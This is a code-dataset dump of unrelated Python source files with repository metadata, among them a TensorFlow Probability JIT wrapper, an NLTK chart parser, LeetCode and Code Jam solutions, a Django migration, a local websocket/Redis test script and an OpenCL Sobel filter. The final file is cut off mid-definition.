# shape/dtype metadata or non-Tensor objects, so compiling them has no
# benefit (and may not be traceable).
DEFAULT_METHODS_EXCLUDED_FROM_JIT = (
    # tfd.Distribution
    'event_shape',
    'event_shape_tensor',
    'batch_shape',
    'batch_shape_tensor',
    'dtype',
    'kl_divergence', # Wrapping applied explicitly in `_traced_kl_divergence`.
    'experimental_default_event_space_bijector',
    'experimental_local_measure',
    # tfb.Bijector
    # TODO(davmre): Test wrapping bijectors.
    'forward_event_shape',
    'forward_event_shape_tensor',
    'inverse_event_shape',
    'inverse_event_shape_tensor',
    'forward_dtype',
    'inverse_dtype',
    'forward_event_ndims',
    'inverse_event_ndims',
    'experimental_compute_density_correction',
)
if NUMPY_MODE:
  # NumPy backend has no JIT: wrapping is a no-op passthrough.
  JitPublicMethods = lambda f, trace_only=False: f
else:
  class JitPublicMethods(object):
    """Wrapper to compile an object's public methods using XLA."""

    def __init__(self,
                 object_to_wrap,
                 trace_only=False,
                 methods_to_exclude=DEFAULT_METHODS_EXCLUDED_FROM_JIT):
      """Wraps an object's public methods using `tf.function`/`jax.jit`.

      Args:
        object_to_wrap: Any Python object; for example, a
          `tfd.Distribution` instance.
        trace_only: Python `bool`; if `True`, the object's methods are
          not compiled, but only traced with `tf.function(jit_compile=False)`.
          This is only valid in the TensorFlow backend; in JAX, passing
          `trace_only=True` will raise an exception.
          Default value: `False`.
        methods_to_exclude: List of Python `str` method names not to wrap.
          For example, these may include methods that do not take or return
          Tensor values. By default, a number of `tfd.Distribution` and
          `tfb.Bijector` methods and properties are excluded (e.g.,
          `event_shape`, `batch_shape`, `dtype`, etc.).
          Default value:
            tfp.experimental.util.DEFAULT_METHODS_EXCLUDED_FROM_JIT`
      """
      self._object_to_wrap = object_to_wrap
      self._methods_to_exclude = methods_to_exclude
      self._trace_only = trace_only

    @property
    def methods_to_exclude(self):
      return self._methods_to_exclude

    @property
    def trace_only(self):
      return self._trace_only

    @property
    def object_to_wrap(self):
      return self._object_to_wrap

    def copy(self, **kwargs):
      # Copy the wrapped object and re-wrap with the same settings.
      return type(self)(self.object_to_wrap.copy(**kwargs),
                        trace_only=self.trace_only,
                        methods_to_exclude=self.methods_to_exclude)

    def __getitem__(self, slices):
      # Slicing delegates to the wrapped object; result is re-wrapped.
      return type(self)(self.object_to_wrap[slices],
                        trace_only=self.trace_only,
                        methods_to_exclude=self.methods_to_exclude)

    def __getattr__(self, name):
      # Note: this method is called only as a fallback if an attribute isn't
      # otherwise set.
      if name == 'object_to_wrap':
        # Avoid triggering an infinite loop if __init__ hasn't run yet.
        raise AttributeError()
      attr = getattr(self.object_to_wrap, name)
      if callable(attr):
        if not (name.startswith('_') or name in self.methods_to_exclude):
          # On the first call to a method, wrap it, and store the wrapped
          # function to be reused by future calls.  (setattr means
          # __getattr__ is not invoked for this name again.)
          attr = tf.function(autograph=False,
                             jit_compile=not self.trace_only)(attr)
          setattr(self, name, attr)
      return attr
@kullback_leibler.RegisterKL(JitPublicMethods, distribution_lib.Distribution)
@kullback_leibler.RegisterKL(distribution_lib.Distribution, JitPublicMethods)
@kullback_leibler.RegisterKL(JitPublicMethods, JitPublicMethods)
def _compiled_kl_divergence(d1, d2, name=None):
  """Compiled KL divergence between two distributions."""
  # Unwrap any `JitPublicMethods` arguments; compile (rather than just
  # trace) only if every wrapped argument requested compilation.
  trace_only = True
  unwrapped = []
  for d in (d1, d2):
    if isinstance(d, JitPublicMethods):
      trace_only = trace_only and d.trace_only
      d = d.object_to_wrap
    unwrapped.append(d)
  left, right = unwrapped
  kl_fn = tf.function(autograph=False, jit_compile=not trace_only)(
      left.kl_divergence)
  return kl_fn(right, name=name)
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
8e9e7723d0d08bab41f6b2e74af3f118ff5cb2e3 | 53e90091d10a2454e14a02ecc689e355ac2a7cc1 | /book3/pylisting/code_wfst.py | e3d6c5128b16804c82c340c83396238548917d71 | [] | no_license | dougalg/nltk.github.com | aac74cf03d17475adc177ac08691359cb1f4adb6 | 9a04ac5264f5ef08d87d6b920580c9160042f1a0 | refs/heads/master | 2020-12-07T17:15:15.894232 | 2014-04-21T14:11:17 | 2014-04-21T14:11:17 | 18,965,594 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,326 | py | # Natural Language Toolkit: code_wfst
def init_wfst(tokens, grammar):
    """Build an (n+1)x(n+1) well-formed-substring chart for `tokens`.

    Cell [i][i+1] is seeded with the left-hand side of the first lexical
    production covering tokens[i]; every other cell starts as None.
    """
    n = len(tokens)
    wfst = [[None] * (n + 1) for _ in range(n + 1)]
    for i, token in enumerate(tokens):
        lexical = grammar.productions(rhs=token)
        wfst[i][i + 1] = lexical[0].lhs()
    return wfst
def complete_wfst(wfst, tokens, grammar, trace=False):
    """Complete the chart bottom-up (CYK): combine adjacent spans whose
    categories match a binary production's right-hand side.

    When `trace` is true, each successful combination is printed.
    Returns the (mutated) chart.
    """
    # Map each binary RHS pair to its LHS for O(1) lookup.
    index = dict((p.rhs(), p.lhs()) for p in grammar.productions())
    numtokens = len(tokens)
    # Widen spans from 2 words up to the whole sentence.
    for span in range(2, numtokens+1):
        for start in range(numtokens+1-span):
            end = start + span
            # Try every split point inside (start, end).
            for mid in range(start+1, end):
                nt1, nt2 = wfst[start][mid], wfst[mid][end]
                if nt1 and nt2 and (nt1,nt2) in index:
                    wfst[start][end] = index[(nt1,nt2)]
                    if trace:
                        print("[%s] %3s [%s] %3s [%s] ==> [%s] %3s [%s]" % \
                              (start, nt1, mid, nt2, end, start, index[(nt1,nt2)], end))
    return wfst
def display(wfst, tokens):
    """Pretty-print the chart: one row per start index, '.' for empty cells."""
    size = len(wfst)
    header = ' '.join("%-4d" % col for col in range(1, size))
    print('\nWFST ' + header)
    for row in range(size - 1):
        print("%d " % row, end=" ")
        for col in range(1, size):
            cell = wfst[row][col] or '.'
            print("%-4s" % cell, end=" ")
        print()
| [
"stevenbird1@gmail.com"
] | stevenbird1@gmail.com |
c413c0507a2af69c905edbbce39795ea9ae12c2d | c9000e5e30825b29febbefa5ad00da1f57551f8e | /04/zhumeichao/Login.py | b425be01877d8e9766d6f68f886054ccc3d22165 | [] | no_license | xiaotian1991/actual-10-homework | 81c58b24f58fc87e4890f1475ad83de8b66ee53b | 0b379ca6189f843f121df4db5814c83262f9981a | refs/heads/master | 2021-06-12T23:35:52.954510 | 2017-03-24T07:41:18 | 2017-03-24T07:41:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | #!/usr/bin/env python
#encoding=utf-8
import Usermod
# Python 2 console entry point: ask the user to pick an action
# ('1' = log in, '2' = register); the prompt strings are in Chinese.
num=raw_input("<登陆1> <注册2>\n 请输入操作数字:")
if num == '1':
    # Load the user list from user.txt and run the login flow.
    userinfo=Usermod.userlist("user.txt")
    Usermod.userlogin(userinfo)
elif num == '2':
    # Load the user list and append a new user to user.txt.
    userinfo=Usermod.userlist("user.txt")
    Usermod.adduser(userinfo,"user.txt")
else:
    # Any other input: print usage help.
    print "PS:\t输入数字1 ->登陆\n\t输入数字2 ->注册"
| [
"shengxinjing@addnewer.com"
] | shengxinjing@addnewer.com |
2f468e02b23ded4932329802f1f8dbd8609875d0 | 17f1811abda6c828460b77f460671f9c2f464204 | /leetcode/duplicates_list.py | ce3849e0269c3d72f27886e3afb9af07c0d8ac5a | [] | no_license | rishabhranawat/challenge | f10f69fc30881a0571c4321b466a89aeeb06e568 | e836343be5185f8843bb77197fccff250e9a77e3 | refs/heads/master | 2021-01-21T15:13:47.590675 | 2020-04-25T15:26:42 | 2020-04-25T15:26:42 | 91,833,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # Problem Source: LeetCode
# Given an array of integers, 1 ≤ a[i] ≤ n (n = size of array),
# some elements appear twice and others appear once.
# Find all the elements that appear twice in this array.
# Could you do it without extra space and in O(n) runtime?
# Example:
# Input:
# [4,3,2,7,8,2,3,1]
# Output:
# [2,3]
### ### ###
def findDuplicates(nums):
    """
    Return every value that appears twice in `nums`, in ascending order.

    Uses the index-marking trick (negate nums[v-1] the first time v is
    seen), meeting the problem's O(n) time / O(1) extra-space requirement.
    The previous version sorted a copy: O(n log n) time and O(n) space.
    Relies on the stated constraint 1 <= a[i] <= n (= len(nums)).
    The input list is restored to its original contents before returning.

    :type nums: List[int]
    :rtype: List[int]
    """
    twice = []
    for value in nums:
        # `value` may already be negated by an earlier iteration.
        idx = abs(value) - 1
        if nums[idx] < 0:
            # Slot already visited once -> this value is a duplicate.
            twice.append(abs(value))
        else:
            nums[idx] = -nums[idx]
    # Undo the sign markers so the caller's list is unchanged.
    for i in range(len(nums)):
        nums[i] = abs(nums[i])
    # Sorted output matches the behavior of the previous implementation.
    twice.sort()
    return twice
print(findDuplicates([4,3,2,7,8,2,3,1])) | [
"rishabhranawat12345@gmail.com"
] | rishabhranawat12345@gmail.com |
63755929f03cbc64d858991d90397a001ce08a5b | 1b0846fddb7c1e8c09e080db40dca9a9590a2519 | /news_scrap/migrations/0005_auto_20180806_0954.py | e7b63894612a3e74bc3b7d6d63fbee799f71a2e0 | [] | no_license | Serdiuk-Roman/self-written_project | 3d657982e95112fa1031241a8f8e2ee138533450 | 3aa0e733173871c2da692deb1a9346e635f90e75 | refs/heads/master | 2022-12-11T11:25:59.841042 | 2018-08-07T19:53:01 | 2018-08-07T19:53:01 | 143,103,670 | 0 | 0 | null | 2022-12-08T02:19:51 | 2018-08-01T04:25:21 | Python | UTF-8 | Python | false | false | 392 | py | # Generated by Django 2.0.7 on 2018-08-06 09:54
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make ShortNews.news_link a unique URLField."""

    dependencies = [
        ('news_scrap', '0004_auto_20180627_0759'),
    ]

    operations = [
        # Enforce one ShortNews row per news link URL.
        migrations.AlterField(
            model_name='shortnews',
            name='news_link',
            field=models.URLField(unique=True),
        ),
    ]
| [
"serdiuk.r@gmail.com"
] | serdiuk.r@gmail.com |
8385accd5777109597a2d31c8effe9b4dffa447a | 42229d7c76c305cfde63659ad715a4e6bef0ea99 | /goods/test/class_inside_distance.py | 20bc5d36fc8d67eb626ddc098a24d94d68ce79a3 | [] | no_license | LRJliurj/GoodsServer | 4a043d2f1195e4793aad327732201375495a88f9 | c8c1bbda4fa4ba2a0e8a4055a67b7278ddb15b03 | refs/heads/master | 2020-07-05T14:03:58.536658 | 2019-09-24T03:01:53 | 2019-09-24T03:01:53 | 202,668,466 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,411 | py | __author__ = 'admin'
# *_*coding:utf-8 *_*
import numpy as np
import os
from goods.util import distance_util
#计算单个商品类内差异值
def inside_distance(img_feature_path, img_dis_path):
    """Compute pairwise pcos distances between all feature vectors in
    `img_feature_path` (CSV: filename, f1, f2, ...) and write them to
    `img_dis_path` sorted by distance, descending, as "name1---name2,dist".
    """
    # Parse "filename,f1,f2,..." lines into {filename: [floats]}.
    img_features = {}
    with open(img_feature_path, 'r') as f:
        for line in f.readlines():
            parts = line.split(",")
            img_features[parts[0]] = [float(p) for p in parts[1:]]

    # Distance for every ordered pair (including self-pairs), with the
    # same progress printing as before.
    img_dis = {}
    for name1 in img_features:
        for name2 in img_features:
            print (len(img_features[name1]))
            print(len(img_features[name2]))
            dis = distance_util.pcos(img_features[name1], img_features[name2])
            img_dis[name1 + "---" + name2] = dis
            print (name1 + "---" + name2, str(dis))

    # Largest distances first.
    ranked = sorted(img_dis.items(), key=lambda pair: pair[1], reverse=True)
    print (ranked)
    with open(img_dis_path, 'w') as f:
        for entry in ranked:
            f.write(entry[0] + "," + str(float(entry[1])))
            f.write("\n")
if __name__=='__main__':
    # Bray-Curtis distance (translated from the original Chinese comment).
    # Compute intra-class distances for one item's feature file and write
    # the ranked pairs next to it.
    img_feature_path = "E:\\opt\\data\\feature_top\\69024894.txt"
    img_dis_path = "E:\\opt\\data\\feature_top\\step2_inside_cos\\69024894.txt"
    inside_distance(img_feature_path,img_dis_path)
| [
"908601417@qq.com"
] | 908601417@qq.com |
937536e97205603aaafc55317b87850a6abf7d9e | 54f395d77fd98fce2e42f9883953118a4cd74cf8 | /test/socket_overload.py | 96ca82600e39f9deba4e315164d0ed83b6752451 | [] | no_license | zdimon/angular-chat | bfdaa0cb5861da03764402202179711edb92c131 | 483ddf675e8c6233b3a0642b9aa86fe058ef9e44 | refs/heads/master | 2020-04-06T05:30:52.957098 | 2017-01-31T12:12:00 | 2017-01-31T12:12:00 | 39,195,268 | 0 | 1 | null | 2015-09-08T13:27:47 | 2015-07-16T12:21:08 | Python | UTF-8 | Python | false | false | 1,090 | py | import websocket
from websocket import create_connection
import logging
import json
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), '../djapp'))
import brukva
# Module-level brukva (async Redis) client; connecting here is a side
# effect of importing this module.
bclient = brukva.Client()
bclient.connect()
import time
def test_brukva():
    """Load test: flood the 'test_test' Redis channel with close_room messages."""
    mes = { 'action': 'close_room' }
    print 'send to test_test'
    # One million publishes of the same JSON payload.
    for i in range(1000000):
        bclient.publish('test_test', json.dumps(mes))
def test():
    """Open a websocket to the local chat server and run until closed."""
    def on_message(ws, message):
        # Echo every frame received from the server.
        print message
    def on_error(ws, error):
        #print error
        print 'errrrrr'
    def on_close(ws):
        print "### closed ###"
    def on_open(ws):
        # Identify this client to the server as soon as the socket opens.
        print 'start serve'
        data = { 'action': 'connect', 'tpa': 'test', 'user_id': '150032', 'source': 'site' }
        ws.send(json.dumps(data))
    ws = websocket.WebSocketApp("ws://localhost:8889/ws",
                                on_message = on_message,
                                on_error = on_error,
                                on_close = on_close)
    ws.on_open = on_open
    # Blocks until the connection is closed.
    ws.run_forever()
    ws.close()
if __name__ == '__main__':
    # Run the websocket smoke test, then exit explicitly with a message.
    test()
    import sys
    sys.exit("quit")
| [
"zdimon77@gmail.com"
] | zdimon77@gmail.com |
3c89317045ceea3ccaeb459a84d66c919258d4ca | 4e02d5b0b1b0739553fd40bbbdfb0d02c9830350 | /0387_First_Unique_Character_in_a_String.py | 5434e1b8da203b3a94bc89b9f30006df155d5acb | [] | no_license | bingli8802/leetcode | b039ab6af62f0c8992463393f561caafd21056e6 | a509b383a42f54313970168d9faa11f088f18708 | refs/heads/master | 2023-03-29T03:11:45.801090 | 2021-03-23T22:55:16 | 2021-03-23T22:55:16 | 279,321,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 730 | py | class Solution(object):
def firstUniqChar(self, s):
    """
    Return the index of the first non-repeating character in `s`,
    or -1 if every character repeats (or `s` is empty).

    :type s: str
    :rtype: int
    """
    # Count occurrences with a plain dict. The previous version used
    # `defaultdict`, which is never imported in this module and would
    # raise NameError at runtime; it also tracked a float('inf') sentinel
    # unnecessarily.
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    # First position whose character occurs exactly once.
    for i, ch in enumerate(s):
        if counts[ch] == 1:
            return i
    return -1
# Variant: a character is unique iff its first and last occurrence coincide.
def firstUniqChar(self, s):
    """
    Return the index of the first non-repeating character in `s`,
    or -1 if there is none.

    :type s: str
    :rtype: int
    """
    for pos, ch in enumerate(s):
        # Unique characters occur exactly once, at `pos` itself.
        if s.index(ch) == s.rindex(ch):
            return pos
    return -1
| [
"noreply@github.com"
] | bingli8802.noreply@github.com |
ca1f2f962c2c3961e8d6261325d768ab71aad657 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_136/1267.py | f52e8c78ada28936bf0480feb093bd78584889c3 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 714 | py | #!/usr/bin/env python
# vim: set filetype=python et sw=4 ts=4:
import sys
# solve() recurses once per farm purchase; raise the limit generously.
sys.setrecursionlimit(1024*1024)
# Number of test cases, read from the first line of stdin at import time.
T = int(sys.stdin.readline())
def seconds_to_reach(target, rate):
    """Time (seconds) to produce `target` cookies at `rate` cookies/sec."""
    return target / rate

def solve(C, F, X, rate):
    """Minimum time to accumulate X cookies, given the option of repeatedly
    buying a farm that costs C cookies and adds F cookies/sec to `rate`.

    Iterative formulation: keep buying farms while doing so strictly beats
    waiting; otherwise just wait out the remaining target.
    """
    elapsed = 0.0
    while True:
        wait_out = seconds_to_reach(X, rate)
        buy_out = seconds_to_reach(C, rate) + seconds_to_reach(X, rate + F)
        if buy_out >= wait_out:
            return elapsed + wait_out
        elapsed += seconds_to_reach(C, rate)
        rate += F
# Python 2 driver: read T lines of "C F X" and print each answer in
# Code Jam's "Case #k: <answer>" format (7 decimal places).
for case in xrange(T):
    C, F, X = [float(x) for x in sys.stdin.readline().split()]
    sys.stdout.write("Case #%d: %.7f" % (case + 1, solve(C, F, X, 2.0)))
    sys.stdout.write("\n")
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
163b4a862ee387590032965b8fa924cb93c8285d | c68c841c67f03ab8794027ff8d64d29356e21bf1 | /Two Sum.py | 3abbd4c8b7c4aa74e47f5b64b07dc156c8fd010a | [] | no_license | jke-zq/my_lintcode | 430e482bae5b18b59eb0e9b5b577606e93c4c961 | 64ce451a7f7be9ec42474f0b1164243838077a6f | refs/heads/master | 2020-05-21T20:29:11.236967 | 2018-06-14T15:14:55 | 2018-06-14T15:14:55 | 37,583,264 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,182 | py | class Solution:
"""
@param numbers : An array of Integer
@param target : target = numbers[index1] + numbers[index2]
@return : [index1 + 1, index2 + 1] (index1 < index2)
"""
def twoSum(self, numbers, target):
    """
    Find two indices whose values sum to `target`, single pass, O(n).

    @param numbers : An array of Integer
    @param target : target = numbers[index1] + numbers[index2]
    @return : [index1 + 1, index2 + 1] (index1 < index2), or [-1, -1]
              when no pair sums to `target`.
    """
    # (An earlier sort-and-two-pointer draft was left here commented out;
    # removed as dead code.)
    seen = {}  # value -> 1-based index of its most recent occurrence
    for i, value in enumerate(numbers):
        complement = target - value
        if complement in seen:
            return [seen[complement], i + 1]
        seen[value] = i + 1
    return [-1, -1]
"jke0zq@gmail.com"
] | jke0zq@gmail.com |
330d730d2bb745c574dbbb58a796b26d37a5afcb | 92e6f33a01b8f9e1e3b4914c67fbd6789a6abaac | /pygenic/backend/Backend.py | d9df99f5aaa80256e399441ad091bf558aad567c | [] | no_license | daeken/pygenic | 9a4b5b31eeca53b228999508d4f19bf56808cfaf | 8878a8bfdfb823a9143548a1de8e19c15c62523d | refs/heads/master | 2021-01-17T16:09:30.498552 | 2016-07-28T03:45:43 | 2016-07-28T03:45:43 | 61,535,924 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | from pygenic import *
class Backend(object):
    """Base class for pygenic code-generation backends.

    Subclasses register themselves by name via the `Backend.register`
    decorator and provide one handler method per s-expression head; the
    `Value` and `emit` hooks used below are not defined here, so they are
    presumably supplied by subclasses (TODO confirm).
    """
    # Registry of backend classes keyed by lowercased class name.
    backends = {}

    @staticmethod
    def register(cls):
        # Class decorator: record `cls` in the registry, return it unchanged.
        Backend.backends[cls.__name__.lower()] = cls
        return cls

    # Whitespace unit used for indentation.
    ws = '\t'

    def __init__(self, hexLiterals=True):
        # Counter backing tempname(); hexLiterals presumably controls how
        # integer literals are rendered by subclasses -- TODO confirm.
        self.temp_i = 0
        self.hexLiterals = hexLiterals

    def tempname(self, prefix='temp'):
        # Return a fresh identifier of the form __<prefix>_<n>.
        self.temp_i += 1
        return '__%s_%i' % (prefix, self.temp_i)

    def generate(self, node):
        """Generate code for `node` (a pygenic Node, a tuple s-expression,
        or a leaf value)."""
        if isinstance(node, Node):
            # Entry point: reset output state, then walk the s-expression.
            self.output = ''
            self.indentation = 0
            self.generate(node.sexp(byName=True))
            return self.output
        elif not isinstance(node, tuple):
            # Leaf value; delegated to the subclass-provided Value hook.
            return self.Value(node)
        # Dispatch on the s-expression head: ('Module', ...) -> self.Module(...).
        return getattr(self, node[0])(*node[1:])

    def passthru(self, *args):
        # Generate each child and emit any text a child returned.
        for arg in args:
            ret = self.generate(arg)
            if ret is not None:
                self.emit(ret)

    # A Module node simply generates its children in order.
    Module = passthru
| [
"cody.brocious@gmail.com"
] | cody.brocious@gmail.com |
db2576d2ad6f96a0a3c6a41291d124e0c66a19c4 | 991c4f5318d090b937a6f6d2e9639612c5366724 | /simple_eyetracker/image_processing/simple_cl_conv.py | 3d5c564d9862549a976a2802fbaf067913d5406f | [] | no_license | coxlab/simple_eyetracker | d7da3c680e5a7f5d70bec2d2ab7596b419d3f8d8 | b857eb1e671d1751d3c58f9c59184432caadcdd0 | refs/heads/master | 2021-03-22T01:10:11.178095 | 2017-09-28T20:49:54 | 2017-09-28T20:49:54 | 102,738,996 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,230 | py |
import pyopencl as cl
import pyopencl.array as cl_array
from pyopencl import clmath
from pyopencl.elementwise import ElementwiseKernel
import numpy as np
import numpy.testing as nptest
from localmem_cl_conv import LocalMemorySeparableCorrelation
class NaiveSeparableCorrelation:
    """Separable 2D correlation on the GPU using plain global-memory kernels.

    The OpenCL program (one kernel per 1D pass) is compiled once at
    construction; `__call__` runs the row pass into a scratch buffer and
    the column pass into the output. Image borders are handled by
    mirroring the out-of-range offset back inside the image.
    """

    def __init__(self, ctx, queue):
        # pyopencl context and command queue used for all kernel launches.
        self.ctx = ctx
        self.queue = queue

        # OpenCL C source for the two passes. Each work-item computes one
        # output pixel at (row, col) = (get_global_id(0), get_global_id(1)).
        code = """
        __kernel void separable_correlation_row(__global float *result,
                                                __global const float *input,
                                                int image_width,
                                                int image_height,
                                                __global const float *kernel_row,
                                                int kernel_width){

            const int kernel_radius = kernel_width / 2;

            int row = get_global_id(0);
            int col = get_global_id(1);

            float sum = 0.0;

            int im_index = row * image_width + col;

            for(int i = 0; i < kernel_width; i++){
                int k = i - kernel_radius;

                if( (col + k) < 0 ){
                    k *= -1;
                    k -= 1;
                }

                if( (col + k) >= image_width){
                    k *= -1;
                    k += 1;
                }

                sum += input[im_index + k] * kernel_row[i];
            }

            result[im_index] = sum;
            return;
        }

        __kernel void separable_correlation_col(__global float *result,
                                                __global const float *input,
                                                int image_width,
                                                int image_height,
                                                __global const float *kernel_col,
                                                int kernel_width){

            const int kernel_radius = kernel_width / 2;

            int row = get_global_id(0);
            int col = get_global_id(1);

            float sum = 0.0;

            for(int i = 0; i < kernel_width; i++){
                int k = i - kernel_radius;

                if( (row + k) < 0 ){
                    k *= -1;
                    k -= 1;
                }

                if( (row + k) >= image_height ){
                    k *= -1;
                    k += 1;
                }

                int im_index = (row + k) * image_width + col;
                sum = sum + input[im_index]*kernel_col[i];
            }

            result[row * image_width + col] = sum;
        }
        """

        program = cl.Program(self.ctx, code).build()

        # Small adapter exposing the two kernel handles as attributes.
        class ProgramProxy:
            def __init__(self, prog):
                self.separable_correlation_row = prog.separable_correlation_row
                self.separable_correlation_col = prog.separable_correlation_col

        self.program = ProgramProxy(program)

    def __call__(self,
                 input_buf,
                 row_buf,
                 col_buf,
                 output_buf,
                 intermed_buf=None):
        """Correlate `input_buf` with the separable kernel (row_buf, col_buf),
        writing into `output_buf`.

        `intermed_buf` (same shape as the input) holds the row-pass result;
        it is allocated on the fly when not supplied.
        """
        (h, w) = input_buf.shape
        r = row_buf.shape[0]
        c = col_buf.shape[0]

        if intermed_buf is None:
            intermed_buf = cl_array.empty_like(input_buf)

        # Row pass: input -> intermediate.
        self.program.separable_correlation_row(self.queue,
                                               (h, w),
                                               None,
                                               intermed_buf.data,
                                               input_buf.data,
                                               np.int32(w), np.int32(h),
                                               row_buf.data,
                                               np.int32(r))
        # Column pass: intermediate -> output.
        self.program.separable_correlation_col(self.queue,
                                               (h, w),
                                               None,
                                               output_buf.data,
                                               intermed_buf.data,
                                               np.int32(w), np.int32(h),
                                               col_buf.data,
                                               np.int32(c))
class Sobel:
    """GPU Sobel filter: separable correlations for the x/y gradients plus
    an elementwise kernel for the gradient magnitude."""

    def __init__(self, ctx, queue, dtype=np.float32):
        self.ctx = ctx
        self.queue = queue

        # Separable Sobel taps: derivative [1, 0, -1], smoothing [1, 2, 1].
        sobel_c = np.array([1., 0., -1.]).astype(dtype)
        sobel_r = np.array([1., 2., 1.]).astype(dtype)

        self.sobel_c = cl_array.to_device(self.queue, sobel_c)
        self.sobel_r = cl_array.to_device(self.queue, sobel_r)

        # Lazily (re)allocated intermediate buffer; see __call__.
        self.scratch = None

        # NOTE(review): the tap vectors are passed here at construction
        # *and* again on every __call__, while __main__ below constructs
        # LocalMemorySeparableCorrelation without them -- confirm the
        # expected signature of LocalMemorySeparableCorrelation.
        self.sepconv_rc = LocalMemorySeparableCorrelation(self.ctx, self.queue, sobel_r, sobel_c)
        self.sepconv_cr = LocalMemorySeparableCorrelation(self.ctx, self.queue, sobel_c, sobel_r)

        # Map the numpy dtype to the matching OpenCL C scalar type for the
        # elementwise kernel's argument declaration.
        TYPE = ""
        if dtype == np.float32:
            TYPE = "float"
        elif dtype == np.uint8:
            TYPE = "unsigned char"
        elif dtype == np.uint16:
            TYPE = "unsigned short"

        # Elementwise gradient magnitude: sqrt(gx^2 + gy^2).
        self.mag = ElementwiseKernel(ctx,
                                     "float *result, %s *imgx, %s *imgy" % (TYPE, TYPE),
                                     "result[i] = sqrt((float)imgx[i]*imgx[i] + (float)imgy[i]*imgy[i])",
                                     "mag")

    def __call__(self,
                 input_buf,
                 imgx_buf,
                 imgy_buf,
                 mag_buf):
        """Fill imgx_buf/imgy_buf with the x/y gradients of `input_buf`
        and mag_buf with their magnitude."""
        # Reuse the scratch buffer across calls when shapes allow it.
        if self.scratch is None or self.scratch.shape != input_buf.shape:
            self.scratch = cl_array.empty_like(input_buf)

        self.sepconv_cr(input_buf, self.sobel_c, self.sobel_r, imgx_buf, self.scratch)
        self.sepconv_rc(input_buf, self.sobel_r, self.sobel_c, imgy_buf, self.scratch)
        self.mag(mag_buf, imgx_buf, imgy_buf)
def cl_test_sobel(im):
    """Run the Sobel filter on host image `im` and return the host-side
    result arrays as a tuple (magnitude, gradient_x, gradient_y)."""
    context = cl.create_some_context()
    cmd_queue = cl.CommandQueue(context)
    detector = Sobel(context, cmd_queue)

    im_buf = cl_array.to_device(cmd_queue, im)
    mag_buf = cl_array.empty_like(im_buf)
    imgx_buf = cl_array.empty_like(im_buf)
    imgy_buf = cl_array.empty_like(im_buf)

    detector(im_buf, imgx_buf, imgy_buf, mag_buf)
    return (mag_buf.get(), imgx_buf.get(), imgy_buf.get())
if __name__ == '__main__':
    import matplotlib.pylab as plt

    # Hard-coded test-input selector: random image with 5-tap kernels;
    # the disabled branches use small deterministic fixtures.
    if True:
        test_im = np.random.rand(217, 101).astype(np.float32)
        row_k = np.random.rand(5,).astype(np.float32)
        col_k = np.random.rand(5,).astype(np.float32)
    elif False:
        a = np.array(range(10, 1, -1), dtype=np.float32)
        test_im = np.outer(a, a)
        row_k = np.array([1, 2, 3]).astype(np.float32)
        col_k = np.array([5, 6, 7]).astype(np.float32)
    else:
        test_im = np.ones([10, 10]).astype(np.float32)
        row_k = np.array([1, 2, 3]).astype(np.float32)
        col_k = np.array([2, 4, 5]).astype(np.float32)

    # Device setup and buffer allocation.
    ctx = cl.create_some_context()
    queue = cl.CommandQueue(ctx)

    in_buf = cl_array.to_device(queue, test_im)
    row_buf = cl_array.to_device(queue, row_k)
    col_buf = cl_array.to_device(queue, col_k)
    out_buf = cl_array.empty_like(in_buf)
    imgx_buf = cl_array.empty_like(in_buf)
    imgy_buf = cl_array.empty_like(in_buf)
    mag_buf = cl_array.empty_like(in_buf)

    # Test the Sobel
    sobel = Sobel(ctx, queue)
    sobel(in_buf, imgx_buf, imgy_buf, mag_buf)
    print(imgx_buf.get())
    print(mag_buf.get())

    # Test the conv
    #conv = NaiveSeparableCorrelation(ctx, queue)
    conv = LocalMemorySeparableCorrelation(ctx, queue)
    conv(in_buf, row_buf, col_buf, out_buf)

    # Compare against scipy's 2D correlation of the equivalent full kernel
    # (outer product of the two 1D taps) with symmetric borders.
    full_kernel = np.outer(col_k, row_k)
    print(full_kernel)

    from scipy.signal import correlate2d as c2d
    gt = c2d(test_im, full_kernel, mode='same', boundary='symm')

    # print "Input: "
    # print(test_im)
    # print "ground truth"
    # print(gt)
    # print "cl output"
    # print(out_buf.get())
    # print "diff"
    # print(gt - out_buf.get())

    # Only show the error image when the GPU result disagrees with scipy.
    if not np.allclose(gt, out_buf.get()):
        plt.imshow(gt - out_buf.get())
        plt.show()
| [
"david.daniel.cox@gmail.com"
] | david.daniel.cox@gmail.com |
80a9a0385609f6092de63c881530a49feb80b62d | 09fd456a6552f42c124c148978289fae1af2d5c3 | /LinkedList/21.py | bbf74d969562ffdc2b3217be6edda17bdc828f3b | [] | no_license | hoang-ng/LeetCode | 60b4e68cbcf54cbe763d1f98a70f52e628ab32fb | 5407c6d858bfa43325363503c31134e560522be3 | refs/heads/master | 2021-04-10T11:34:35.310374 | 2020-07-28T10:22:05 | 2020-07-28T10:22:05 | 248,932,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,321 | py | # 21. Merge Two Sorted Lists
# Merge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.
# Example:
# Input: 1->2->4, 1->3->4
# Output: 1->1->2->3->4->4
# Definition for singly-linked list.
class ListNode(object):
    """Singly-linked list node."""
    def __init__(self, x):
        self.val = x
        self.next = None


class Solution(object):
    def mergeTwoLists(self, l1, l2):
